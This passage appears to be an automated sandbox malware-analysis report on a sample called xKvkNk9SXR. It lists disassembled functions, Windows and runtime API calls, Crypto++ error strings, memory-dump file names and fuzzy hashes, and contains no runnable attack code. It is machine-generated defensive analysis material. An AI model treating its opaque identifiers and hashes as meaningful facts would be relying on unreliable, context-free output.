                                          • GetDateFormatW.KERNEL32(00000000,-00000004,00000000,00000000,00000000,?,?,?,00000000,00000000,-00000004,00000000,00A6F133,?,00000000,00000000), ref: 00A73103
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: DateFormat
                                          • String ID: GetDateFormatEx$w#G!
                                          • API String ID: 2793631785-769453984
                                          • Opcode ID: a2472a44b00e52d334cfe43e3f61c388e8e9ddb0a173e50262665a160aa8659e
                                          • Instruction ID: c2df6eeb068b2d9483b449593376a09b89c48cb15ab3f723805cb3d3584dbb43
                                          • Opcode Fuzzy Hash: a2472a44b00e52d334cfe43e3f61c388e8e9ddb0a173e50262665a160aa8659e
                                          • Instruction Fuzzy Hash: 24015A32640208FBCF029F90DD01E9E3F72FF18711F418514FE1855160DA728A72EB80
                                          Function 009B6300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B634E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B6314
                                          • StreamTransformation: this object doesn't support random access, xrefs: 009B6325
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: StreamTransformation: this object doesn't support random access$w#G!
                                          • API String ID: 3976011213-1960431624
                                          • Opcode ID: 49b286942f560ef575a5f4b110e307df6b657d09c14399fb49e96b1e2f4b1517
                                          • Instruction ID: d8b20b6c8a7c53fb19a2ed460f98ceb344e37f1dca8044931e4430e71424330a
                                          • Opcode Fuzzy Hash: 49b286942f560ef575a5f4b110e307df6b657d09c14399fb49e96b1e2f4b1517
                                          • Instruction Fuzzy Hash: 24F03071910208ABC701EFA5DD42FDEB7FCFB08710F504565B911A3690DB75AE048A60
                                          Function 009B6820 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B686E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B6834
                                          • GeneratableCryptoMaterial: this object does not support key/parameter generation, xrefs: 009B6845
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: GeneratableCryptoMaterial: this object does not support key/parameter generation$w#G!
                                          • API String ID: 3976011213-2833122217
                                          • Opcode ID: 31fd8eb88b59f1f52176346fde71b0f776534c6dc22c5abd5cc04efccba60212
                                          • Instruction ID: e073b85ec0c9eb4963aa5661a6b21adf1a1b5589cac4eac4315d6f524b8482b1
                                          • Opcode Fuzzy Hash: 31fd8eb88b59f1f52176346fde71b0f776534c6dc22c5abd5cc04efccba60212
                                          • Instruction Fuzzy Hash: ADF06D71A00208ABC704EFA4CD42F9DB7F8FB09714F6045A5E411A7290DB31AD04CB50
                                          Function 009B64A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B64EE
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B64B4
                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 009B64C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: RandomNumberGenerator: IncorporateEntropy not implemented$w#G!
                                          • API String ID: 3976011213-434694297
                                          • Opcode ID: 8a4fb62b664233c9e2df3f9806b6fbe1496f1fa72250636542f52143658031c6
                                          • Instruction ID: b5da25b6d49333dd33098c5524b8f74997aed15ccb9315fcdf37de9f8576ddca
                                          • Opcode Fuzzy Hash: 8a4fb62b664233c9e2df3f9806b6fbe1496f1fa72250636542f52143658031c6
                                          • Instruction Fuzzy Hash: 09F03A71940608EBC701EBA5CD42FDEB7FCFB08B14F5106A5A921A3690DB35AA04CA90
                                          Function 009B6260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B62C4
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B6274
                                          • : this object doesn't support resynchronization, xrefs: 009B6295
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: : this object doesn't support resynchronization$w#G!
                                          • API String ID: 3976011213-2861801057
                                          • Opcode ID: 744a2fd64639d3062f74513c0dfff01a03d4da63d42291f2e9bfcc617079a458
                                          • Instruction ID: e21bb22dcba45a456aff28c597110a798a22bba9176dabbf8356823caa690499
                                          • Opcode Fuzzy Hash: 744a2fd64639d3062f74513c0dfff01a03d4da63d42291f2e9bfcc617079a458
                                          • Instruction Fuzzy Hash: E7F03C71900248ABCB01EBA4CE45FCEBBF8BB09704F104665B515E7691EB75AA08CB91
                                          Function 00A60FAB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _abort
                                          • String ID: w#G!$w#G!
                                          • API String ID: 1888311480-1134387879
                                          • Opcode ID: 004bac969265009b68020d95a49bb6cbd3d48f267362cb3e3bcd8d0e9269d0e8
                                          • Instruction ID: 72613ba0921e172205f41abfac7a2278bb3c84876d1e1900c43e77bd2e026e30
                                          • Opcode Fuzzy Hash: 004bac969265009b68020d95a49bb6cbd3d48f267362cb3e3bcd8d0e9269d0e8
                                          • Instruction Fuzzy Hash: 6AF0B432911704EBC714EFF5EE16E5D3772A700B20F118226F1159F1D1DB305C428B41
                                          Function 00A731DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetTimeFormatW.KERNEL32(00000000,-00000004,00000000,00000000,00000000,?,?,?,00000000,00000000,-00000004,00000000,00A6F133,?,00000000,00000000), ref: 00A73233
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FormatTime
                                          • String ID: GetTimeFormatEx$w#G!
                                          • API String ID: 3606616251-2072928690
                                          • Opcode ID: 38a9f18c5f9869e1721873706ffdcfe838a0de539a7c8fcdcaa93bcae5eb9df9
                                          • Instruction ID: 5bc9fa236f1b589a9bc6ba948f2f7a60d8dd5ae456cf2faf34f4d9d956ec75af
                                          • Opcode Fuzzy Hash: 38a9f18c5f9869e1721873706ffdcfe838a0de539a7c8fcdcaa93bcae5eb9df9
                                          • Instruction Fuzzy Hash: 20F0AF32640208BBCF02AF91DC06EAF7FA5EB18710F128125FD0996261CA718B21EBC1
                                          Function 00A4EE17 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4EE5F
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4EE6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                          • String ID: pContext
                                          • API String ID: 1687795959-2046700901
                                          • Opcode ID: 2983b7d938498f2138a003812ece63c2d6fd10f5721adae5bc2775f21fa2aeb0
                                          • Instruction ID: c57b287461bdd3339bd9fd21e8828d9df8591b37a16f3d5e8e8b9b8b93e55271
                                          • Opcode Fuzzy Hash: 2983b7d938498f2138a003812ece63c2d6fd10f5721adae5bc2775f21fa2aeb0
                                          • Instruction Fuzzy Hash: 69F0BB39700214778B04EB95D845C5EB7BDAF88B647014469E911A7351DF70DD018BD0
                                          Function 009B6550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B659E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • BufferedTransformation: this object is not attachable, xrefs: 009B6575
                                          • w#G!, xrefs: 009B6564
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: BufferedTransformation: this object is not attachable$w#G!
                                          • API String ID: 3976011213-543208889
                                          • Opcode ID: 6734b6791e7325d63df6cd89f7395dfae97507a19a1590abaf48c8e8e6315edf
                                          • Instruction ID: 5d2fb2325b5e4cb78eb51799830568f0b06e7035140a312f4a8de457d0b0c417
                                          • Opcode Fuzzy Hash: 6734b6791e7325d63df6cd89f7395dfae97507a19a1590abaf48c8e8e6315edf
                                          • Instruction Fuzzy Hash: A1F03071900648ABCB05EBA1CE42FDEB7FCFB08714F500A65A521B31D0DB756A088A51
                                          Function 009B4E40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B4E7E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: $$w#G!
                                          • API String ID: 2659868963-638371399
                                          • Opcode ID: 165b973efd03917e5b6fe87bb0661b873255925229f305fcb5904f0c69e33c89
                                          • Instruction ID: ca2b782788f2e727ac7a7d5c9be91a57ebfb4fc41cee1e19c6179b6664eb36d7
                                          • Opcode Fuzzy Hash: 165b973efd03917e5b6fe87bb0661b873255925229f305fcb5904f0c69e33c89
                                          • Instruction Fuzzy Hash: 3301A2708107488FCB10DFA9D54479EFBF8AF19304F50825DD58567341E7B4AA88CBE1
                                          Function 00A7324A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00A7DE3A,?,00000055,00000050), ref: 00A73294
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: DefaultUser
                                          • String ID: GetUserDefaultLocaleName$w#G!
                                          • API String ID: 3358694519-3370358545
                                          • Opcode ID: f36054c204a02f3b1ef321e921c9602e191553028c8c11dded53d3684e710b00
                                          • Instruction ID: 53e10a4be6368515aad8472df099e98bfbaaaa61af52dea871377ea3f64ba9c0
                                          • Opcode Fuzzy Hash: f36054c204a02f3b1ef321e921c9602e191553028c8c11dded53d3684e710b00
                                          • Instruction Fuzzy Hash: 5BF09632740218BBCF116F91CD06EAE7F65EB15720F11C165FD099A161DE719F11A6C4
                                          Function 009F6170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F61C1
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • BufferedTransformation: this object can't be reinitialized, xrefs: 009F6198
                                          • w#G!, xrefs: 009F6184
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: BufferedTransformation: this object can't be reinitialized$w#G!
                                          • API String ID: 3976011213-2950935438
                                          • Opcode ID: 7b36ffa0527c324372409d4e85ebb56e2f323e086bc67a75544bf46c0683bcd0
                                          • Instruction ID: a42447b4faf0241628956b15194f068d856794cea03911f3c2b946dc0fa7f4a4
                                          • Opcode Fuzzy Hash: 7b36ffa0527c324372409d4e85ebb56e2f323e086bc67a75544bf46c0683bcd0
                                          • Instruction Fuzzy Hash: E6F01C71910248AACF01EBE5CD42FEEB7B8FB08B10F440A29E511B6290EB746A088A50
                                          Function 00A732B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00A7466A,-00000020,00000FA0,00000000,?,?,?,?), ref: 00A732FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx$w#G!
                                          • API String ID: 2593887523-349527883
                                          • Opcode ID: 42c870de4e27d5fa6e20a886d73a8b90fa5e437323fd4a413d4b0debd420686b
                                          • Instruction ID: e50ca69138674bd15d0a2d624ae806189bbce6e9d9db7569d3d43282db534fb1
                                          • Opcode Fuzzy Hash: 42c870de4e27d5fa6e20a886d73a8b90fa5e437323fd4a413d4b0debd420686b
                                          • Instruction Fuzzy Hash: 79F0B436741308BBCF119F50CD02D9EBFB1EB18710F01C125FE099A260DE718E21AB84
                                          Function 00A72F92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Free
                                          • String ID: FlsFree$w#G!
                                          • API String ID: 3978063606-713219860
                                          • Opcode ID: aeeeda3a9cd8e24e36822fd6c251c392c45a24209484ec184236982d231921ce
                                          • Instruction ID: cf93f90e9f5a95317d8121ad1eba29514a50f9c428d4788e45834c2189663971
                                          • Opcode Fuzzy Hash: aeeeda3a9cd8e24e36822fd6c251c392c45a24209484ec184236982d231921ce
                                          • Instruction Fuzzy Hash: 61E0E532B80218BF8B00AF649C06E3FBBF0EF54B10B118169FD099B241CE704F1196C6
                                          Function 00A72F3C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc$w#G!
                                          • API String ID: 2773662609-3967997801
                                          • Opcode ID: 3371a135c7800299e240b173f3f983864910bdac6d3e275f463929be42d59e27
                                          • Instruction ID: 81fa90d86a5fbdc4402b1d4a053cf4f97018f355e3fd56f403e1055161aa8d40
                                          • Opcode Fuzzy Hash: 3371a135c7800299e240b173f3f983864910bdac6d3e275f463929be42d59e27
                                          • Instruction Fuzzy Hash: 60E0EC31740314BB8A019FE49D05E6E77B4DB54711B418265FD0996240DDB15F1256C5
                                          Function 009B2400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B2432
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: Dflt$w#G!
                                          • API String ID: 2659868963-2762319387
